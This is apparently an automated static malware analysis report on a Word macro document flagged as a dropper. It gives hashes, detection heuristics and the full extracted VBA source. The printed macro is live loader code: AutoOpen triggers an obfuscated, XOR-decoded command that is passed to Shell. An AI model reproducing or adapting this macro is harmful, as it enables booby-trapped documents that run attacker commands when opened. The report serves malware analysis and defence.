Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e76c4dfc3be86c0c…

MALICIOUS

Office (OOXML)

62.7 KB Created: 2020-06-22 23:03:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-10-03
MD5: b7f3c25788e58d1b00165de2ac089095 SHA-1: 0cc882981d51359f6894f48ac29d264d0ae80ec2 SHA-256: e76c4dfc3be86c0c4ac46a50406c53ea3f72a224ae265182302147a9d9e0a655
192 Risk Score

Heuristics 7

  • ClamAV: Doc.Dropper.Generic-9823774-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Generic-9823774-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (lgqHqFmylET)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7339 bytes
SHA-256: 7f44d9b45925f63deb4ce669d7f0fbd3133bf54d1d34fc6aefa70f6082cfae15
Detection
ClamAV: No threats found
Obfuscation or payload: likely
33 of 62 identifiers look randomly generated (e.g. 'GJZkbnwPUIxHqZUf') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Private NsJXnantEx       As Boolean
Private MiIuYJIQVapLJw(((0 Xor 0) + 0) To (43 Xor 20)) As Byte
Private jDVRwwwkYZlS(((0 Xor 0) + (0 Xor 0)) To 127) As Byte
Sub imCupfmytbCX()
Dim lgqHqFmylET As String
Dim LfYNuIozFM As String
lgqHqFmylET = PkMtkugIzAdJ(Array(141, (12 Xor 67), 237, (40 + (9 Xor 17)), ((2 Xor 75) + 6), (124 + 41), (5 Xor 152), (9 Xor 83), (123 + (67 Xor 15)), ((48 Xor 124) + (14 Xor 168)), (157 Xor 52), (124 + (19 Xor 36)), (29 + 82), (36 + (95 Xor 54)), 91, (165 + (37 Xor 111)), (54 + 77), 85, (5 + 49), ((5 Xor 13) + 93), ((3 Xor 69) + (14 Xor 38)), ((60 Xor 73) + 59), (4 + 55)), (0 Xor 0)) & PkMtkugIzAdJ(Array((16 Xor 5), (3 Xor 87), ((0 Xor 126) + (92 Xor 45)), (7 Xor 236), (5 Xor 23), (122 Xor 211), 149, (8 Xor 143), (81 + 71), 125, 194, (96 Xor 217), _
((0 Xor 2) + 10), 136, ((41 Xor 68) + (16 Xor 104)), 87, 95, ((3 Xor 16) + (16 Xor 3)), (23 Xor 92), (26 Xor 208), (24 + 205), ((6 Xor 118) + (111 Xor 231)), (20 + (197 Xor 12)), ((52 Xor 126) + 146), (5 + 8), 44, (58 Xor 168), ((4 Xor 32) + 62), ((23 Xor 85) + 78), (31 Xor 178), 15, (159 Xor 101), (50 Xor 79), ((62 Xor 165) + 91), ((104 Xor 194) + (16 Xor 42)), (115 + 14), (9 + 14), (78 Xor 195), (62 + 10), (167 + (1 Xor 6)), ((81 Xor 52) + (71 Xor 22)), (41 + 27), (136 + (10 Xor 56)), (3 Xor 36), ((13 Xor 80) + (24 Xor 85)), 9, (90 + (6 Xor 11)), 45, ((0 Xor 1) + 99), _
(22 + 48), 122, (75 Xor 7), (17 + (102 Xor 246)), 233, ((11 Xor 72) + 32), 243, (6 + 2), 64, ((15 Xor 21) + (113 Xor 164)), (93 Xor 188), (135 + 81), (22 + (94 Xor 47)), (11 Xor 21), 80, 35, 128, 125, ((9 Xor 2) + (0 Xor 0)), (7 + 126), ((96 Xor 200) + 45), ((15 Xor 0) + 41), ((44 Xor 16) + 32), (48 + 47), (2 + (0 Xor 2)), 236, 52, ((16 Xor 10) + 3), (19 + (49 Xor 169)), (179 Xor 121), ((0 Xor 12) + (5 Xor 9)), (118 + 4), (112 + (32 Xor 14)), (44 + 123), ((17 Xor 58) + 0), (63 + 26), (32 Xor 165), ((39 Xor 17) + (40 Xor 178)), 253, ((15 Xor 51) + 137), (15 + 228), 124, (49 Xor 151), _
((15 Xor 168) + 5), (34 Xor 21), ((3 Xor 42) + 188), (28 + (3 Xor 6)), (4 Xor 15), ((39 Xor 8) + 14), ((7 Xor 15) + 12), (6 + 89), 33, (55 + (24 Xor 60)), ((71 Xor 246) + 24)), (5 + (4 Xor 22)))
Shell (lgqHqFmylET)
End Sub
Sub AutoOpen()
imCupfmytbCX
End Sub
Public Function VpnzjhRwEdOFSN(ByVal InqFgVqihcg As String) As Byte()
If Not NsJXnantEx Then NdXoNLPkgULAY
Dim BmgDhMLZFURPM() As Byte: BmgDhMLZFURPM = bwYiGGvrmu(InqFgVqihcg)
Dim cdAuOBJmHZeY As Long: cdAuOBJmHZeY = UBound(BmgDhMLZFURPM) + ((1 Xor 0) + 0)
If cdAuOBJmHZeY Mod 4 <> 0 Then Err.Raise vbObjectError, , ""
Do While cdAuOBJmHZeY > ((0 Xor 0) + 0)
If BmgDhMLZFURPM(cdAuOBJmHZeY - 1) <> Asc("=") Then Exit Do
cdAuOBJmHZeY = cdAuOBJmHZeY - (1 Xor 0)
Loop
Dim iHpWxhllQO As Long: iHpWxhllQO = (cdAuOBJmHZeY * 3) \ 4
Dim CaikzdTzmqMb() As Byte
ReDim CaikzdTzmqMb((0 Xor 0) To iHpWxhllQO - (0 + (1 Xor 0))) As Byte
Dim tHRkGlEQVYkCg As Long
Dim ySroOGPRdQRrKB As Long
Do While tHRkGlEQVYkCg < cdAuOBJmHZeY
Dim ZjnycKWwPqZbNs As Byte: ZjnycKWwPqZbNs = BmgDhMLZFURPM(tHRkGlEQVYkCg): tHRkGlEQVYkCg = tHRkGlEQVYkCg + 1
Dim nKKESTawciAOZE As Byte: nKKESTawciAOZE = BmgDhMLZFURPM(tHRkGlEQVYkCg): tHRkGlEQVYkCg = tHRkGlEQVYkCg + ((0 Xor 0) + (0 Xor 1))
Dim gvHcQmjepyK As Byte: If tHRkGlEQVYkCg < cdAuOBJmHZeY Then gvHcQmjepyK = BmgDhMLZFURPM(tHRkGlEQVYkCg): tHRkGlEQVYkCg = tHRkGlEQVYkCg + 1 Else gvHcQmjepyK = Asc("A")
Dim DhmhqscRjTKy As Byte: If tHRkGlEQVYkCg < cdAuOBJmHZeY Then DhmhqscRjTKy = BmgDhMLZFURPM(tHRkGlEQVYkCg): tHRkGlEQVYkCg = tHRkGlEQVYkCg + (1 + 0) Else DhmhqscRjTKy = Asc("A")
If ZjnycKWwPqZbNs > (82 + (31 Xor 50)) Or nKKESTawciAOZE > (120 + 7) Or gvHcQmjepyK > (21 Xor 106) Or DhmhqscRjTKy > (38 + (4 Xor 93)) Then _
Err.Raise vbObjectError, , ""
Dim ClHWavdNYJDOQ As Byte: ClHWavdNYJDOQ = jDVRwwwkYZlS(ZjnycKWwPqZbNs)
Dim HokzAIswlBfbJU As Byte: HokzAIswlBfbJU = jDVRwwwkYZlS(nKKESTawciAOZE)
Dim CYfgMmYoXjSbS As Byte: CYfgMmYoXjSbS = jDVRwwwkYZlS(gvHcQmjepyK)
Dim CHcSiiduLMAMf As Byte: CHcSiiduLMAMf = jDVRwwwkYZlS(DhmhqscRjTKy)
If ClHWavdNYJDOQ > 63 Or HokzAIswlBfbJU > (38 + 25) Or CYfgMmYoXjSbS > (1 + (1 Xor 63)) Or CHcSiiduLMAMf > 63 Then _
Err.Raise vbObjectError, , ""
Dim dwcJjJhDhrYS As Byte: dwcJjJhDhrYS = (ClHWavdNYJDOQ * (2 + 2)) Or (HokzAIswlBfbJU \ &H10)
Dim UHBdzJnMdl As Byte: UHBdzJnMdl = ((HokzAIswlBfbJU And &HF) * &H10) Or (CYfgMmYoXjSbS \ 4)
Dim rPDVdrsZvxdHK As Byte: rPDVdrsZvxdHK = ((CYfgMmYoXjSbS And (1 Xor 2)) * &H40) Or CHcSiiduLMAMf
CaikzdTzmqMb(ySroOGPRdQRrKB) = dwcJjJhDhrYS: ySroOGPRdQRrKB = ySroOGPRdQRrKB + 1
If ySroOGPRdQRrKB < iHpWxhllQO Then CaikzdTzmqMb(ySroOGPRdQRrKB) = UHBdzJnMdl: ySroOGPRdQRrKB = ySroOGPRdQRrKB + ((1 Xor 0) + (0 Xor 0))
If ySroOGPRdQRrKB < iHpWxhllQO Then CaikzdTzmqMb(ySroOGPRdQRrKB) = rPDVdrsZvxdHK: ySroOGPRdQRrKB = ySroOGPRdQRrKB + 1
Loop
VpnzjhRwEdOFSN = CaikzdTzmqMb
End Function
Private Sub NdXoNLPkgULAY()
Dim MYIGYuLYTgjD As Integer, IMMsEwrpiAy As Integer
IMMsEwrpiAy = ((0 Xor 0) + (0 Xor 0))
For MYIGYuLYTgjD = Asc("A") To Asc("Z"): MiIuYJIQVapLJw(IMMsEwrpiAy) = MYIGYuLYTgjD: IMMsEwrpiAy = IMMsEwrpiAy + (0 Xor 1): Next
For MYIGYuLYTgjD = Asc("a") To Asc("z"): MiIuYJIQVapLJw(IMMsEwrpiAy) = MYIGYuLYTgjD: IMMsEwrpiAy = IMMsEwrpiAy + (1 Xor 0): Next
For MYIGYuLYTgjD = Asc("0") To Asc("9"): MiIuYJIQVapLJw(IMMsEwrpiAy) = MYIGYuLYTgjD: IMMsEwrpiAy = IMMsEwrpiAy + 1: Next
MiIuYJIQVapLJw(IMMsEwrpiAy) = Asc("+"): IMMsEwrpiAy = IMMsEwrpiAy + (0 + (1 Xor 0))
MiIuYJIQVapLJw(IMMsEwrpiAy) = Asc("/"): IMMsEwrpiAy = IMMsEwrpiAy + 1
For IMMsEwrpiAy = ((0 Xor 0) + (0 Xor 0)) To (102 + (5 Xor 28)): jDVRwwwkYZlS(IMMsEwrpiAy) = (132 Xor 123): Next
For IMMsEwrpiAy = (0 Xor 0) To (34 + 29): jDVRwwwkYZlS(MiIuYJIQVapLJw(IMMsEwrpiAy)) = IMMsEwrpiAy: Next
NsJXnantEx = True
End Sub
Private Function bwYiGGvrmu(ByVal InqFgVqihcg As String) As Byte()
Dim HokzAIswlBfbJU() As Byte: HokzAIswlBfbJU = InqFgVqihcg
Dim EjzesyJnGBmVMf As Long: EjzesyJnGBmVMf = (UBound(HokzAIswlBfbJU) + (1 Xor 0)) \ (1 Xor 3)
If EjzesyJnGBmVMf = 0 Then bwYiGGvrmu = HokzAIswlBfbJU: Exit Function
Dim CYfgMmYoXjSbS() As Byte
ReDim CYfgMmYoXjSbS((0 + (0 Xor 0)) To EjzesyJnGBmVMf - (0 + (1 Xor 0))) As Byte
Dim dsEYCpjjovr As Long
For dsEYCpjjovr = (0 Xor 0) To EjzesyJnGBmVMf - ((0 Xor 0) + (1 Xor 0))
Dim MYIGYuLYTgjD As Long: MYIGYuLYTgjD = HokzAIswlBfbJU((1 + (1 Xor 0)) * dsEYCpjjovr) + 256 * CLng(HokzAIswlBfbJU((0 Xor 2) * dsEYCpjjovr + (0 + 1)))
If MYIGYuLYTgjD >= ((160 Xor 94) + 2) Then MYIGYuLYTgjD = Asc("?")
CYfgMmYoXjSbS(dsEYCpjjovr) = MYIGYuLYTgjD
Next
bwYiGGvrmu = CYfgMmYoXjSbS
End Function
Private Function PkMtkugIzAdJ(GqPnJsNaZKmtnL As Variant, fjDGiowAFD As Integer)
Dim YNGmAASUAKX As String
Dim ZlsSnYheFBSOT() As Byte
ZlsSnYheFBSOT = VpnzjhRwEdOFSN(ActiveDocument.Variables("GJZkbnwPUIxHqZUf"))
YNGmAASUAKX = ""
For IMMsEwrpiAy = LBound(GqPnJsNaZKmtnL) To UBound(GqPnJsNaZKmtnL)
YNGmAASUAKX = YNGmAASUAKX & Chr(ZlsSnYheFBSOT(IMMsEwrpiAy + fjDGiowAFD) Xor GqPnJsNaZKmtnL(IMMsEwrpiAy))
Next
PkMtkugIzAdJ = YNGmAASUAKX
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 28672 bytes
SHA-256: 04016854dfe79ee7a5240098057f7bdd9412e241b3bbe2713eac07a0b2b1e7aa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
140 of 231 identifiers look randomly generated (e.g. 'tZtzDSgkXEUBHg9v') — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.